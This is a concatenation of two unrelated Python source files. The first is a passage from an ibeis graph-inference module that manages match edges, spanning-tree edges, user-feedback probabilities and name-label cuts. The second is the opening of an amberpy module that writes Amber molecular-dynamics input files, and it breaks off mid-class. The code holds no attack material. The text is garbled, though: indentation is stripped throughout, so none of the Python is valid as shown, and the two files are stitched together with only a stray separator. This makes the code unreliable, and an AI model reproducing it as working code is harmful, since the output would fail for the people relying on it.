>>> new_df.loc[is_add, 'am_rowid'] = add_ams
>>> new_df.set_index('am_rowid', drop=False, inplace=True)
"""
import pandas as pd
existing_ams = new_feedback['am_rowid'][~np.isnan(new_feedback['am_rowid'])]
both_ams = np.intersect1d(old_feedback['am_rowid'], existing_ams).astype(np.int)
all_new_df = new_feedback.loc[both_ams]
all_old_df = old_feedback.loc[both_ams]
is_changed = ~np.all(all_new_df.values == all_old_df.values, axis=1)
new_df_ = all_new_df[is_changed]
add_df = new_feedback.loc[np.isnan(new_feedback['am_rowid'])].copy()
old_df = all_old_df[is_changed]
new_df = pd.concat([new_df_, add_df])
return new_df, old_df
#def add_edges(infr, aid_pairs):
# #attr_dict={}):
# #, attr_dict)
# graph = infr.graph
# graph.add_edges_from(aid_pairs)
def reset_name_labels(infr):
if infr.verbose:
print('[infr] reset_name_labels')
graph = infr.graph
orig_names = nx.get_node_attrs(graph, 'orig_name_label')
nx.set_node_attrs(graph, 'name_label', orig_names)
def lookup_cm(infr, aid1, aid2):
if infr.cm_list is None:
return None, aid1, aid2
aid2_idx = ut.make_index_lookup(
[cm.qaid for cm in infr.cm_list])
try:
idx = aid2_idx[aid1]
cm = infr.cm_list[idx]
except KeyError:
# switch order
aid1, aid2 = aid2, aid1
idx = aid2_idx[aid1]
cm = infr.cm_list[idx]
return cm, aid1, aid2
def remove_name_labels(infr):
if infr.verbose:
print('[infr] remove_name_labels()')
graph = infr.graph
# make distinct names for all nodes
#import utool
#with utool.embed_on_exception_context:
distinct_names = {node: -graph.node[node]['aid'] for node in graph.nodes()}
nx.set_node_attrs(graph, 'name_label', distinct_names)
def remove_mst_edges(infr):
if infr.verbose:
print('[infr] remove_mst_edges')
graph = infr.graph
edge_to_ismst = nx.get_edge_attrs(graph, '_mst_edge')
mst_edges = [edge for edge, flag in edge_to_ismst.items() if flag]
graph.remove_edges_from(mst_edges)
def exec_matching(infr, vsone=False, prog_hook=None):
""" Loads chip matches into the inference structure """
if infr.verbose:
print('[infr] exec_matching')
#from ibeis.algo.hots import graph_iden
ibs = infr.ibs
aid_list = infr.aids
cfgdict = {
'can_match_samename': True,
'K': 3,
'Knorm': 3,
'prescore_method': 'csum',
'score_method': 'csum'
}
# TODO: use current nids
qreq_ = ibs.new_query_request(aid_list, aid_list, cfgdict=cfgdict)
cm_list = qreq_.execute(prog_hook=prog_hook)
infr.cm_list = cm_list
infr.qreq_ = qreq_
def exec_vsone(infr, prog_hook=None):
# Post process ranks_top and bottom vsmany queries with vsone
# Execute vsone queries on the best vsmany results
parent_rowids = list(infr.graph.edges())
# Hack to get around default product of qaids
qreq_ = infr.ibs.depc.new_request('vsone', [], [], cfgdict={})
cm_list = qreq_.execute(parent_rowids=parent_rowids,
prog_hook=prog_hook)
infr.vsone_qreq_ = qreq_
infr.vsone_cm_list_ = cm_list
def get_pairwise_features():
# Extract features from the one-vs-one results
pass
def add_feedback(infr, aid1, aid2, state):
""" External helper """
if infr.verbose:
print('[infr] add_feedback(%r, %r, %r)' % (aid1, aid2, state))
edge = tuple(sorted([aid1, aid2]))
if isinstance(state, dict):
assert 'p_match' in state
assert 'p_nomatch' in state
assert 'p_notcomp' in state
review = state
infr.user_feedback[edge].append(review)
elif state == 'unreviewed':
if edge in infr.user_feedback:
del infr.user_feedback[edge]
else:
review = {
'p_match': 0.0,
'p_nomatch': 0.0,
'p_notcomp': 0.0,
}
if state == 'match':
review['p_match'] = 1.0
elif state == 'nomatch':
review['p_nomatch'] = 1.0
elif state == 'notcomp':
review['p_notcomp'] = 1.0
else:
msg = 'state=%r is unknown' % (state,)
print(msg)
assert state in infr.truth_texts.values(), msg
infr.user_feedback[edge].append(review)
def get_feedback_probs(infr):
""" Helper """
unique_pairs = list(infr.user_feedback.keys())
# Take most recent review
review_list = [infr.user_feedback[edge][-1] for edge in unique_pairs]
p_nomatch = np.array(ut.dict_take_column(review_list, 'p_nomatch'))
p_match = np.array(ut.dict_take_column(review_list, 'p_match'))
p_notcomp = np.array(ut.dict_take_column(review_list, 'p_notcomp'))
state_probs = np.vstack([p_nomatch, p_match, p_notcomp])
review_stateid = state_probs.argmax(axis=0)
review_state = ut.take(infr.truth_texts, review_stateid)
p_bg = 0.5 # Needs to be thresh value
part1 = p_match * (1 - p_notcomp)
part2 = p_bg * p_notcomp
p_same_list = part1 + part2
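        # Illustrative worked example (not from the original source): a clean
        # 'match' review (p_match=1.0, p_notcomp=0.0) gives p_same = 1.0, while
        # a pure 'notcomp' review (p_match=0.0, p_notcomp=1.0) falls back to
        # the background probability p_bg = 0.5.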
return p_same_list, unique_pairs, review_state
def apply_mst(infr):
if infr.verbose:
print('[infr] apply_mst')
# Remove old MST edges
infr.remove_mst_edges()
infr.ensure_mst()
def ensure_mst(infr):
"""
        Use minimum spanning tree to ensure all names are connected
Needs to be applied after any operation that adds/removes edges
"""
if infr.verbose:
print('[infr] ensure_mst')
import networkx as nx
# Find clusters by labels
node2_label = nx.get_node_attrs(infr.graph, 'name_label')
label2_nodes = ut.group_items(node2_label.keys(), node2_label.values())
aug_graph = infr.graph.copy().to_undirected()
# remove cut edges
edge_to_iscut = nx.get_edge_attrs(aug_graph, 'is_cut')
cut_edges = [edge for edge, flag in edge_to_iscut.items() if flag]
aug_graph.remove_edges_from(cut_edges)
# Enumerate cliques inside labels
#unflat_edges = [list(ut.product(nodes, nodes)) for nodes in label2_nodes.values()]
unflat_edges = [list(ut.itertwo(nodes)) for nodes in label2_nodes.values()]
node_pairs = [tup for tup in ut.iflatten(unflat_edges) if tup[0] != tup[1]]
# Remove candidate MST edges that exist in the original graph
orig_edges = list(aug_graph.edges())
candidate_mst_edges = [edge for edge in node_pairs if not aug_graph.has_edge(*edge)]
# randomness prevents chains and visually looks better
rng = np.random.RandomState(42)
aug_graph.add_edges_from(candidate_mst_edges)
# Weight edges in aug_graph such that existing edges are chosen
        # to be part of the MST first before supplementary edges.
nx.set_edge_attributes(aug_graph, 'weight',
{edge: 0.1 for edge in orig_edges})
nx.set_edge_attributes(aug_graph, 'weight',
{edge: 10.0 + rng.randint(1, 100)
for edge in candidate_mst_edges})
        new_mst_edges = []
for cc_sub_graph in nx.connected_component_subgraphs(aug_graph):
mst_sub_graph = nx.minimum_spanning_tree(cc_sub_graph)
for edge in mst_sub_graph.edges():
redge = edge[::-1]
# Only add if this edge is not in the original graph
if not (infr.graph.has_edge(*edge) and infr.graph.has_edge(*redge)):
new_mst_edges.append(redge)
        # Add new MST edges to original graph
        if infr.verbose:
            print('[infr] adding %d MST edges' % (len(new_mst_edges)))
        infr.graph.add_edges_from(new_mst_edges)
nx.set_edge_attrs(infr.graph, '_mst_edge', _dz(new_mst_edges, [True]))
def mst_review(infr):
"""
        Adds implicit reviews to connect all nodes with the same name label
"""
if infr.verbose:
            print('[infr] mst_review')
import networkx as nx
# Find clusters by labels
node2_label = nx.get_node_attrs(infr.graph, 'name_label')
label2_nodes = ut.group_items(node2_label.keys(), node2_label.values())
aug_graph = infr.graph.copy().to_undirected()
# remove cut edges
edge_to_iscut = nx.get_edge_attrs(aug_graph, 'is_cut')
cut_edges = [edge for edge, flag in edge_to_iscut.items() if flag]
aug_graph.remove_edges_from(cut_edges)
# Enumerate chains inside labels
unflat_edges = [list(ut.itertwo(nodes)) for nodes in label2_nodes.values()]
node_pairs = [tup for tup in ut.iflatten(unflat_edges) if tup[0] != tup[1]]
# Remove candidate MST edges that exist in the original graph
orig_edges = list(aug_graph.edges())
candidate_mst_edges = [edge for edge in node_pairs if not aug_graph.has_edge(*edge)]
aug_graph.add_edges_from(candidate_mst_edges)
# Weight edges in aug_graph such that existing edges are chosen
        # to be part of the MST first before supplementary edges.
def get_edge_mst_weights(edge):
state = aug_graph.get_edge_data(*edge).get('reviewed_state', 'unreviewed')
is_mst = aug_graph.get_edge_data(*edge).get('_mst_edge', False)
normscore = aug_graph.get_edge_data(*edge).get('normscore', 0)
if state == 'match':
# favor reviewed edges
weight = .01
else:
                # favor edges with high scores
weight = 1 + (1 - normscore)
if is_mst:
# try to not use mst edges
weight += 3.0
return weight
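            # Illustrative weights under the scheme above (assumed values, not
            # from the original source): a reviewed 'match' edge gets .01; an
            # unreviewed edge with normscore 0.8 gets 1 + (1 - 0.8) = 1.2; if
            # that edge is also a previous MST edge, 3.0 is added (4.2), so the
            # spanning tree prefers reviewed and high-scoring edges.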
rng = np.random.RandomState(42)
nx.set_edge_attributes(aug_graph, 'weight',
{edge: get_edge_mst_weights(edge) for edge in orig_edges})
nx.set_edge_attributes(aug_graph, 'weight',
{edge: 10.0 + rng.randint(1, 100)
for edge in candidate_mst_edges})
new_mst_edges = []
for cc_sub_graph in nx.connected_component_subgraphs(aug_graph):
mst_sub_graph = nx.minimum_spanning_tree(cc_sub_graph)
for edge in mst_sub_graph.edges():
data = aug_graph.get_edge_data(*edge)
state = data.get('reviewed_state', 'unreviewed')
# Append only if this edge needs a review flag
if state != 'match':
new_mst_edges.append(edge)
if infr.verbose:
print('[infr] reviewing %d MST edges' % (len(new_mst_edges)))
# Apply data / add edges if needed
graph = infr.graph
for edge in new_mst_edges:
redge = edge[::-1]
# Only add if this edge is not in the original graph
if graph.has_edge(*edge):
nx.set_edge_attrs(graph, 'reviewed_state', {edge: 'match'})
infr.add_feedback(edge[0], edge[1], 'match')
elif graph.has_edge(*redge):
nx.set_edge_attrs(graph, 'reviewed_state', {redge: 'match'})
infr.add_feedback(edge[0], edge[1], 'match')
else:
graph.add_edge(*edge, attr_dict={
'_mst_edge': True, 'reviewed_state': 'match'})
infr.add_feedback(edge[0], edge[1], 'match')
def get_edge_attr(infr, key):
return nx.get_edge_attributes(infr.graph, key)
def get_node_attr(infr, key):
return nx.get_node_attributes(infr.graph, key)
def apply_match_scores(infr):
"""
CommandLine:
python -m ibeis.algo.hots.graph_iden apply_match_scores --show
Example:
>>> # ENABLE_DOCTEST
>>> from ibeis.algo.hots.graph_iden import * # NOQA
>>> infr = testdata_infr('PZ_MTEST')
>>> infr.exec_matching()
>>> infr.apply_match_edges()
>>> infr.apply_match_scores()
>>> result = infr.apply_match_scores()
>>> infr.get_edge_attr('score')
"""
if infr.verbose:
print('[infr] apply_match_scores')
if infr.cm_list is None:
print('[infr] no scores to apply!')
return
# Build up scores
edges = list(infr.graph.edges())
qaid2_cm = {cm.qaid: cm for cm in infr.cm_list}
edge_to_data = ut.ddict(dict)
for u, v in edges:
if u > v:
u, v = v, u
cm1 = qaid2_cm.get(u, None)
cm2 = qaid2_cm.get(v, None)
scores = []
ranks = []
for cm in ut.filter_Nones([cm1, cm2]):
for aid in [u, v]:
idx = cm.daid2_idx.get(aid, None)
if idx is None:
continue
score = cm.annot_score_list[idx]
rank = cm.get_annot_ranks([aid])[0]
scores.append(score)
ranks.append(rank)
if len(scores) == 0:
score = None
rank = None
else:
rank = vt.safe_min(ranks)
score = np.nanmean(scores)
edge_to_data[(u, v)]['score'] = score
edge_to_data[(u, v)]['rank'] = rank
# Remove existing attrs
ut.nx_delete_edge_attr(infr.graph, 'score')
ut.nx_delete_edge_attr(infr.graph, 'rank')
ut.nx_delete_edge_attr(infr.graph, 'normscore')
edges = list(edge_to_data.keys())
edge_scores = list(ut.take_column(edge_to_data.values(), 'score'))
edge_scores = ut.replace_nones(edge_scores, np.nan)
edge_scores = np.array(edge_scores)
edge_ranks = np.array(list(ut.take_column(edge_to_data.values(), 'rank')))
normscores = edge_scores / np.nanmax(edge_scores)
# Add new attrs
nx.set_edge_attrs(infr.graph, 'score', dict(zip(edges, edge_scores)))
nx.set_edge_attrs(infr.graph, 'rank', dict(zip(edges, edge_ranks)))
nx.set_edge_attrs(infr.graph, 'normscore', dict(zip(edges, normscores)))
#return edge_data
def apply_match_edges(infr, review_cfg={}):
if infr.verbose:
print('[infr] apply_match_edges')
if infr.cm_list is None:
print('[infr] matching has not been run!')
return
qreq_ = infr.qreq_
cm_list = infr.cm_list
ranks_top = review_cfg.get('ranks_top', None)
ranks_bot = review_cfg.get('ranks_bot', None)
edges = get_cm_breaking(qreq_, cm_list,
ranks_top=ranks_top,
ranks_bot=ranks_bot)
# Create match-based graph structure
infr.remove_mst_edges()
infr.graph.add_edges_from(edges)
infr.ensure_mst()
def apply_feedback_edges(infr):
"""
Updates nx graph edge attributes for feedback
Example:
>>> # ENABLE_DOCTEST
>>> from ibeis.algo.hots.graph_iden import * # NOQA
>>> infr = testdata_infr('testdb1')
>>> infr.reset_feedback()
>>> infr.apply_feedback_edges()
>>> result = str(infr)
>>> print(result)
<AnnotInference(nAids=6, nEdges=2)>
"""
if infr.verbose:
print('[infr] apply_feedback_edges')
infr.remove_mst_edges()
ut.nx_delete_edge_attr(infr.graph, 'reviewed_weight')
ut.nx_delete_edge_attr(infr.graph, 'reviewed_state')
p_same_list, unique_pairs_, review_state = infr.get_feedback_probs()
# Put pair orders in context of the graph
unique_pairs = [(aid2, aid1) if infr.graph.has_edge(aid2, aid1) else
(aid1, aid2) for (aid1, aid2) in unique_pairs_]
# Ensure edges exist
for edge in unique_pairs:
if not infr.graph.has_edge(*edge):
#print('add review edge = %r' % (edge,))
infr.graph.add_edge(*edge)
#else:
# #print('have edge edge = %r' % (edge,))
nx.set_edge_attrs(infr.graph, 'reviewed_state',
_dz(unique_pairs, review_state))
nx.set_edge_attrs(infr.graph, 'reviewed_weight',
_dz(unique_pairs, p_same_list))
infr.ensure_mst()
def get_threshold(infr):
# Only use the normalized scores to estimate a threshold
normscores = np.array(nx.get_edge_attrs(infr.graph, 'normscore').values())
if infr.verbose:
print('len(normscores) = %r' % (len(normscores),))
isvalid = ~np.isnan(normscores)
curve = np.sort(normscores[isvalid])
thresh = estimate_threshold(curve, method=None)
if infr.verbose:
print('[estimate] thresh = %r' % (thresh,))
if thresh is None:
thresh = .5
infr.thresh = thresh
return thresh
def apply_weights(infr):
"""
Combines scores and user feedback into edge weights used in inference.
"""
if infr.verbose:
print('[infr] apply_weights')
ut.nx_delete_edge_attr(infr.graph, 'cut_weight')
# mst not needed. No edges are removed
edges = list(infr.graph.edges())
edge2_normscore = nx.get_edge_attrs(infr.graph, 'normscore')
normscores = np.array(ut.dict_take(edge2_normscore, edges, np.nan))
edge2_reviewed_weight = nx.get_edge_attrs(infr.graph, 'reviewed_weight')
reviewed_weights = np.array(ut.dict_take(edge2_reviewed_weight,
edges, np.nan))
# Combine into weights
weights = normscores.copy()
has_review = ~np.isnan(reviewed_weights)
weights[has_review] = reviewed_weights[has_review]
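        # Illustrative example (not from the original source): an edge with
        # normscore 0.7 and no review keeps cut_weight 0.7, while a reviewed
        # edge with reviewed_weight 1.0 is overridden to 1.0.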
# remove nans
is_valid = ~np.isnan(weights)
weights = weights.compress(is_valid, axis=0)
edges = ut.compress(edges, is_valid)
nx.set_edge_attrs(infr.graph, 'cut_weight', _dz(edges, weights))
def get_scalars(infr):
scalars = {}
scalars['reviewed_weight'] = nx.get_edge_attrs(
infr.graph, 'reviewed_weight').values()
scalars['score'] = nx.get_edge_attrs(infr.graph, 'score').values()
scalars['normscore'] = nx.get_edge_attrs(infr.graph, 'normscore').values()
scalars[CUT_WEIGHT_KEY] = nx.get_edge_attrs(infr.graph, CUT_WEIGHT_KEY).values()
return scalars
#def remove_cuts(infr):
# """
# Undo all cuts HACK
# """
# if infr.verbose:
# print('[infr] apply_cuts')
# graph = infr.graph
# infr.ensure_mst()
# ut.nx_delete_edge_attr(graph, 'is_cut')
def apply_cuts(infr):
"""
Cuts edges with different names and uncuts edges with the same name.
"""
if infr.verbose:
print('[infr] apply_cuts')
graph = infr.graph
infr.ensure_mst()
ut.nx_delete_edge_attr(graph, 'is_cut')
node_to_label = nx.get_node_attrs(graph, 'name_label')
edge_to_cut = {(u, v): node_to_label[u] != node_to_label[v]
for (u, v) in graph.edges()}
nx.set_edge_attrs(graph, 'is_cut', edge_to_cut)
def infer_cut(infr, **kwargs):
"""
Applies name labels based on graph inference and then cuts edges
"""
from ibeis.algo.hots import graph_iden
if infr.verbose:
print('[infr] infer_cut')
infr.remove_mst_edges()
infr.model = graph_iden.InfrModel(infr.graph)
model = infr.model
thresh = infr.get_threshold()
#weights = np.array(nx.get_edge_attrs(infr.graph, 'weight').values())
#isvalid = ~np.isnan(weights)
#curve = np.sort(weights[isvalid])
model._update_weights(thresh=thresh)
labeling, params = model.run_inference2(max_labels=len(infr.aids))
#min_labels=min_labels, max_labels=max_labels)
nx.set_node_attrs(infr.graph, 'name_label', model.node_to_label)
infr.apply_cuts()
infr.ensure_mst()
def apply_all(infr):
if infr.verbose:
print('[infr] apply_all')
infr.exec_matching()
infr.apply_mst()
infr.apply_match_edges()
infr.apply_match_scores()
infr.apply_feedback_edges()
infr.apply_weights()
infr.infer_cut()
def find_possible_binary_splits(infr):
#s = infr.simplify_graph(infr.graph)
flagged_edges = []
for subgraph in infr.connected_compoment_reviewed_subgraphs():
inconsistent_edges = [
edge
for edge, state in nx.get_edge_attrs(subgraph, 'reviewed_state').items()
if state == 'nomatch']
subgraph.remove_edges_from(inconsistent_edges)
subgraph = infr.simplify_graph(subgraph)
for s, t in inconsistent_edges:
edgeset = nx.minimum_edge_cut(subgraph, s, t)
edgeset = set([tuple(sorted(edge)) for edge in edgeset])
flagged_edges.append(edgeset)
#print('x = %r' % (x,))
#cut_value, partition = nx.stoer_wagner(subgraph)
#pass
edges = ut.flatten(flagged_edges)
return edges
def piecewise_weighting(infr, normscores, edges):
# Old code
edge_scores = normscores
# Try to put scores in a 0 to 1 range
control_points = [
(0.0, .001),
(3.0, .05),
(15.0, .95),
(None, .99),
]
edge_weights = edge_scores.copy()
for (pt1, prob1), (pt2, prob2) in ut.itertwo(control_points):
if pt1 is None:
pt1 = np.nanmin(edge_scores)
if pt2 is None:
pt2 = np.nanmax(edge_scores) + .0001
pt_len = pt2 - pt1
prob_len = prob2 - prob1
flag = np.logical_and(edge_scores >= pt1, edge_scores < pt2)
edge_weights[flag] = (((edge_scores[flag] - pt1) / pt_len) * prob_len) + prob1
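        # Illustrative example (not from the original source): with the control
        # points above, an edge score of 9.0 falls in the (3.0, 15.0) segment
        # and maps to 0.05 + ((9.0 - 3.0) / 12.0) * 0.9 = 0.5.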
nx.set_edge_attrs(infr.graph, CUT_WEIGHT_KEY, _dz(edges, edge_weights))
        p_same, unique_pairs, _ = infr.get_feedback_probs()
unique_pairs = [tuple(x.tolist()) for x in unique_pairs]
for aid1, aid2 in unique_pairs:
if not infr.graph.has_edge(aid1, aid2):
infr.graph.add_edge(aid1, aid2)
nx.set_edge_attrs(infr.graph, CUT_WEIGHT_KEY, _dz(unique_pairs, p_same))
#nx.set_edge_attrs(infr.graph, 'lw', _dz(unique_pairs, [6.0]))
"""
pt.plot(sorted(edge_weights))
pt.plot(sorted(vt.norm01(edge_scores)))
"""
#import scipy.special
#a = 1.5
#b = 2
#p_same = scipy.special.expit(b * edge_scores - a)
#confidence = (2 * np.abs(0.5 - p_same)) ** 2
def testdata_infr(defaultdb='PZ_MTEST'):
import ibeis
ibs = ibeis.opendb(defaultdb=defaultdb)
aids = [1, 2, 3, 4, 5, 6]
infr = AnnotInference(ibs, aids, autoinit=True)
return infr
if __name__ == '__main__':
r"""
CommandLine:
python -m ibeis.algo.hots.graph_iden
python -m ibeis.algo.hots.graph_iden --allexamples
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed May 26
@author: bs15ansj
This module contains classes used for writing and submitting molecular
dynamics simulation input files for Amber.
MDInput
This is a base class used by all of the input objects.
ProductionInput
Object storing parameters for a production simulation in the NPT
ensemble.
"""
from amberpy.crossbow import run_pmemd
from amberpy.utilities import get_name_from_file
import os
import copy
from typing import Union
from amberpy import get_module_logger
import logging
logger = logging.getLogger(__name__)
class MDInput:
'''Base class for MD inputs.
Do not use this class directly, but instead, use one of the classes that
inherits from this class: MinimisationInput, EquilibrationInput,
ProductionInput. These subclasses determine which attributes will be
turned on/off. In theory, any valid MD flag that can be used with Amber's
pmemd.cuda_SPFP can be given to this input object and will be written into
the mdin file. The attributes listed here are the most common ones, but
please refer the Amber manual for a more detailed description
(https://ambermd.org/doc12/Amber21.pdf).
Attributes
----------
imin : int, default=0
Flag to run minimisation.
0 = run molecular dynamics without any minimisation.
1 = perform energy minimisation.
maxcyc : int, default=5000
The maximum number of minimisation cycles to use.
ncyc : int, default=2500
The number of steepest descent minimisation cycles to use.
irest : int, default=1
Flag to restart from a simulation.
0 = do not restart from a simulation, instead start a new one ignoring
velocities and setting the timestep count to 0.
1 = restart from a simulation, reading coordinates and velocities from
a previously saved restart file.
ntx : int, default=5
Flag to read velocities from coordinate file.
1 = read coordinates but not velocities.
5 = read coordinates and velocities.
ntt : int, default=3
Flag for temperature scaling.
        0 = constant total energy classical dynamics.
1 = constant temperature using the weak coupling algorithm.
2 = Anderson-like temperature coupling.
3 = use Langevin dynamics with a collision frequency given by gamma_ln.
9 = optimized Isokinetic Nose-Hoover chain ensemble.
10 = stochastic Isokinetic Nose-Hoover RESPA integrator.
11 = stochastic version of Berendsen thermostat, also known as Bussi
thermostat
gamma_ln : float, default=1.0
Friction coefficient (ps^-1) when ntt=3.
temp0 : float, default=310.0
Target temperature if ntt > 0.
tempi : float, default=0.0
Initial temperature if ntt > 0. If set to 0.0, velocities are
calculated from the forces.
cut : float, default=8.0
Non-bonded cutoff in Angstroms.
nstlim : int, default=125000
        Total number of MD steps to perform.
dt : float, default=0.004
Integrator time step in picoseconds.
ntc : int, default=2
Flag for SHAKE to perform bond length constraints.
1 = SHAKE is not performed.
2 = bonds containing hydrogen are constrained.
3 = all bonds are constrained.
ntf : int, default=2
Flag for force evaluation (typically set ntf=ntc).
1 = complete interaction calculated.
2 = bond interactions involving H-atoms omitted (use with ntc=2).
3 = all the bond interactions are omitted (use with ntc=3).
4 = angle involving H-atoms and all bonds are omitted.
5 = all bond and angle interactions are omitted.
6 = dihedrals involving H-atoms and all bonds and all angle
interactions are omitted.
7 = all bond, angle and dihedral interactions are omitted.
8 = all bond, angle, dihedral and non-bonded interactions are omitted.
ntpr : int, default=1000
Write energy information to mdout and mdin files every 'ntpr' steps.
ntwx : int, default=25000
Write coordinates to trajectory every 'ntwx' steps.
ntwr : int, default=1000
Write coordinates to a restart file every 'ntwr' steps.
ntwv : int, default=0
        Write velocities to an mdvel file every 'ntwv' steps.
-1 = write velocities to trajectory at an interval defined by 'ntwx'.
0 = do not write velocities.
ntwf : int, default=0
Write forces to an mdfrc file every 'ntwf' steps.
-1 = write forces to trajectory at an interval defined by 'ntwx'.
0 = do not write forces.
ntxo : int, default=2
Restart file format.
1 = formatted (ASCII).
2 = netCDF (nc, recommended).
    ioutfm : int, default=1
        Trajectory/velocity file format.
        0 = formatted (ASCII).
        1 = binary netCDF (nc, recommended).
iwrap : int, default=1
Coordinate wrapping.
0 = do not wrap.
1 = wrap coordinates when printing them to the same unit cell.
    barostat : int, default=2
        Barostat flag.
        1 = Berendsen.
        2 = Monte Carlo.
ntp : int, default=0
Flag for constant pressure dynamics. Set to >0 for NPT ensemble.
0 = No pressure scaling.
1 = isotropic position scaling.
pres0 : float, default=1.0
Target external pressure, in bar.
    posres : tuple or bool, default=False
        Tuple of ((start, end) residue ranges, restraint weight) defining the
        protein chain residues to be restrained, or False for no restraints.
'''
def __init__(self, **kwargs):
'''
How this class is initialised depends on which key word arguments are
supplied. In theory, you could call this class directly by specifying
the all of the key word arguments that you want in the mdin file,
however, the preffered method would be to instantiate one of the
sublasses which ensure that the keyword arguments are set correctly.
Alternatively, you can make a new input class to inherit from this and
set the key word arguments within it's __init__ method.
Parameters
----------
**kwargs
The parameters for this argument can be set to any of the
attributes listed in the docstring of this class.
'''
# Set required (default) attributes
self.ntpr: int = 1000
self.watnam: str = "'WAT'"
self.owtnm: str = "'O'"
self.posres: tuple = False
self.cut: float = 8.0
self.ntxo: int = 2
# If minimisation is turned on, enable minimisation specific attributes
if kwargs['imin'] == 1:
self.imin: int = 1
self.maxcyc: int = 5000
self.ncyc: int = 2500
# If minimisation is turned off, enable simulation specific attributes
elif kwargs['imin'] == 0:
self.imin: int = 0
self.irest: int = 1
self.ntx: int = 5
self.ntt: int = 3
self.gamma_ln: float = 1.0
# If an initial temperature is given, enable the tempi attribute
if 'tempi' in kwargs:
self.tempi = kwargs['tempi']
self.temp0: float = 310.0
self.nstlim: int = 2500000
self.dt: float = 0.004
self.ntc: int = 2
self.ntf: int = 2
self.ntwx: int = 25000
self.ntwr: int = 1000
self.ntwv: int = 0
self.ntwf: int = 0
self.ioutfm: int = 1
self.iwrap: int = 1
# If the ntp argument is given, turn on pressure control attributes
if kwargs['ntp'] == 1:
self.ntp: int = 1
self.pres0: float = 1.0
self.barostat: int = 2
# Get a list of attributes. Only those that have been turned on will
# be in the list
attributes = list(self.__dict__.keys())
# Update attributes with any given via kwargs
for arg in kwargs:
if arg in attributes:
setattr(self, arg, kwargs.get(arg))
# Make a new dictionary of attributes that are turned on
self.arg_dict = {arg : self.__dict__[arg] for arg in attributes}
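        # Illustrative example (an assumption, not part of the original
        # module): MDInput(imin=1, ntp=0, maxcyc=1000) would enable the
        # minimisation attributes and yield an arg_dict containing e.g.
        # {'imin': 1, 'maxcyc': 1000, 'ncyc': 2500, 'ntpr': 1000, ...};
        # only these "turned on" flags are later written to the mdin file.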
def write(self, out_dir, fname):
'''Writes an mdin file containing flags for all of the turned on
attributes. The filename is stored in the fname attribute.
Parameters
----------
out_dir : str
Directory in which the file should be written.
fname : str
The name of the file to be written.
'''
# Set fname attribute (used downstream for making HPC input files)
self.fname = fname
# Open file and write all of the turned on attributes and their values
# in mdin format
with open(f"{out_dir}/{fname}", "w+") as f:
f.write("&cntrl\n")
for var, val in self.arg_dict.items():
                # posres is not a plain mdin flag, so skip it here; it is handled below
if var != "posres":
f.write("\t%s=%s,\n" % (var, val))
# If positional restraints are turned on, add the ntr flag and
# write the restraint mask
if self.posres:
residues, weight = self.posres
f.write('\tntr=1,\n')
f.write(f'/\nProtein posres\n{weight}\nRES ')
for a, b in residues:
f.write(f'{a} {b} ')
f.write('\nEND\nEND')
else:
f.write('/\n')
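    # Illustrative output sketch (an assumption, not part of the original
    # module): if arg_dict contained only {'imin': 1, 'maxcyc': 5000,
    # 'ncyc': 2500, 'cut': 8.0} and posres were disabled, write() would
    # produce roughly:
    #   &cntrl
    #           imin=1,
    #           maxcyc=5000,
    #           ncyc=2500,
    #           cut=8.0,
    #   /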
class MinimisationInput(MDInput):
'''Minimisation input class.
Inherits attributes and methods from the MDInput class.
'''
def __init__(self, **kwargs):
'''
Parameters
----------
**kwargs
Any attribute of the MDInput class can be provided as a key word
argument, however, minimisation will be turned on (simulation
turned off) limiting the number of attributes which can be turned
on.
'''
# Turn minimisation on
kwargs['imin'] = 1
# No pressure control
kwargs['ntp'] = 0
# Print energy more frequently
kwargs['ntpr'] = 100
# Instantiate super class with key word arguments
super().__init__(**kwargs)
def __str__(self):
'''str: The name of the input. Used for file naming.'''
return 'minimisation'
class EquilibrationInput(MDInput):
'''Equilibration (NVT) input class.
Inherits attributes and methods from the MDInput class.
'''
def __init__(self, **kwargs):
'''
Parameters
----------
**kwargs
Any attribute of the MDInput class can be provided as a key word
argument, however, minimisation will be turned off (simulation
turned on) and pressure control will be turned off limiting the
number of attributes which can be turned on.
'''
# Turn minimisation off
kwargs['imin'] = 0
# This is not a restart from a previous simulation
kwargs['irest'] = 0
# Coordinate file does not have velocities
kwargs['ntx'] = 1
# Turn off ntp
kwargs['ntp'] = 0
# Make sure an initial temperature is set
if 'tempi' not in kwargs.keys():
kwargs['tempi'] = 0.0
# Instantiate super class with key word arguments
super().__init__(**kwargs)
def __str__(self):
'''str: The name of the input. Used for file naming.'''
return 'equilibration'
class ProductionInput(MDInput):
'''
Production (NPT) input class.
Inherits attributes and methods from the MDInputclass.
'''
def __init__(self, **kwargs):
'''
Parameters
----------
**kwargs
Any attribute of the MDInput class can be provided as a key word
argument, however, minimisation will be turned off (simulation
            turned on) and pressure control will be turned on (NPT), limiting
            the number of attributes which can be turned on.
'''
# Turn minimisation off
kwargs['imin'] = 0
# Continue on from restart file
kwargs['irest'] = 1
# Read velocities from coordinate file
kwargs['ntx'] = 5
# Turn on NPT ensemble
kwargs['ntp'] = 1
# Instantiate super class with key word arguments
super().__init__(**kwargs)
def __str__(self):
return 'production'
class Simulation:
"""Class for running MD simulations.
Attributes
----------
md_steps : list
A list of MDInput objects.
md_inputs : list
A list of the input file corresponding to the input objects in
md_steps.
name : str
The name of the simulation, used for job naming.
simulation_directory : str
The name of the directory containing all of the simulation
input/output files.
parm7 : str
Path of the parm7 file made by tleap.
rst7 : str
Path of the rst7 file made by tleap.
"""
def __init__(self,
name,
parm7,
rst7,
simulation_directory=None,
):
"""
Parameters
----------
name : str, optional
The name of the simulation, used for job naming.
parm7 : str
Path to the parm7 input file.
rst7 : str
Path to the rst7 input file.
simulation_directory : str or None
Directory to perform the simulation in. Defaults to current
working directory if None
"""
# Set attributes from arguments
self.parm7 = parm7
self.rst7 = rst7
self.ref_rst7 = rst7
self.simulation_directory = simulation_directory
# If no name is given, get it from the parm7 file
if name is None:
name = get_name_from_file(parm7)
# Add an 'a' to the jobname if it starts with a digit because arc does
# not like them
if name[0].isdigit():
name = 'a'+name
# Set attributes
self.name = name
self.md_steps = []
self.md_inputs = []
self.md_job_names = []
self.trajectories = []
self.completed_steps = []
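    # Illustrative usage sketch (an assumption, not part of the original
    # module; file names and directory are hypothetical):
    #   sim = Simulation('mysim', 'complex.parm7', 'complex.rst7',
    #                    simulation_directory='sims/mysim')
    #   sim.add_minimisation_step()
    #   sim.add_equilibration_step(simulation_time=125.0)
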